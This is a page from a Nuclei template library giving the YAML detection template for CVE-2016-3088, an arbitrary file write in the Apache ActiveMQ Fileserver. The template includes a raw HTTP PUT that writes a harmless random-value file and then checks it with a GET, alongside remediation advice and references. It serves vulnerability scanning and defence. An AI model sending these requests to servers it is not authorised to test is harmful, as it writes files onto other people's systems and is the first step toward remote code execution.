Skip to content
Nuclei Templates

Apache ActiveMQ Fileserver - Arbitrary File Write

ID: CVE-2016-3088

Severity: critical

Author: fq_hsu

Tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive

Description

Section titled “Description”

Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.

YAML Source

Section titled “YAML Source”
id: CVE-2016-3088


info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  impact: |
    An attacker can write arbitrary files on the server, potentially leading to remote code execution.
  remediation: |
    Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
    - http://rhn.redhat.com/errata/RHSA-2016-2036.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
    epss-score: 0.83955
    epss-percentile: 0.98478
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: activemq
    shodan-query:
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
  rand1: '{{rand_int(11111111, 99999999)}}'


http:
  - raw:
      - |
        PUT /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}


        {{rand1}}
      - |
        GET /fileserver/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code_1==204"
          - "status_code_2==200"
          - "contains((body_2), '{{rand1}}')"
        condition: and
# digest: 490a00463044022048cfd4a8d824dc36093eea9675963f9508728a3819bd767b959f779361f3063102200428469d6046a4ec7ddd4545a53f291c5cc186b544da3acd75452088029e496c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-3088.yaml"

View on Github